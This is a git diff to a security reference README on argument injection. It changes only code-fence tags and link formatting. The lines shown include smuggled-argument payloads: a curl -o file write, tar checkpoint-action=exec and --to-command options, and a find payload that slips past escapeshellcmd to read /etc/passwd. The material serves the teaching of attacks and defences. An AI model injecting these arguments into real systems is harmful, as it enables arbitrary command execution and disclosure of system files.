diff --git a/Argument Injection/README.md b/Argument Injection/README.md index 04f7ea1..acaa3b7 100644 --- a/Argument Injection/README.md +++ b/Argument Injection/README.md @@ -8,7 +8,7 @@ It can happen in different situations, where you can only inject arguments to a - Bash expansion (ex: *) In the following example, a python script takes the inputs from the command line to generate a ```curl``` command: -``` +```py from shlex import quote,split import sys import subprocess @@ -20,16 +20,16 @@ if __name__=="__main__": r = subprocess.Popen(command) ``` It is possible for an attacker to pass several words to abuse options from ```curl``` command -``` +```ps1 python python_rce.py "https://www.google.fr -o test.py" ``` We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file. -``` +```ps1 ['curl', 'https://www.google.fr', '-o', 'test.py'] ``` ## Summary -* [List of exposed commands](#List of exposed commands) +* [List of exposed commands](#list-of-exposed-commands) * [TAR](#TAR) * [CURL](#CURL) * [WGET](#WGET) @@ -41,7 +41,7 @@ We can see by printing the command that all the parameters are splited allowing ### CURL It is possible to abuse ```curl``` through the following options: -``` +```ps1 -o, --output Write to file instead of stdout -O, --remote-name Write output to a file named as the remote file ``` @@ -51,32 +51,32 @@ In case there is already one option in the command it is possible to inject seve For the ```tar``` command it is possible to inject arbitrary arguments in different commands. Argument injection can happen into the '''extract''' command: -``` +```ps1 --to-command --checkpoint=1 --checkpoint-action=exec= -T or --files-from ``` Or in the '''create''' command: -``` +```ps1 -I= or -I --use-compres-program= ``` There are also short options to work without spaces: -``` +```ps1 -T -I"/path/to/exec" ``` ### FIND Find some_file inside /tmp directory. -``` +```php $file = "some_file"; system("find /tmp -iname ".escapeshellcmd($file)); ``` Print /etc/passwd content. -``` +```php $file = "sth -or -exec cat /etc/passwd ; -quit"; system("find /tmp -iname ".escapeshellcmd($file)); ``` @@ -84,8 +84,6 @@ system("find /tmp -iname ".escapeshellcmd($file)); ## References - - [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) -- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930) -- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) - +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930) +- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)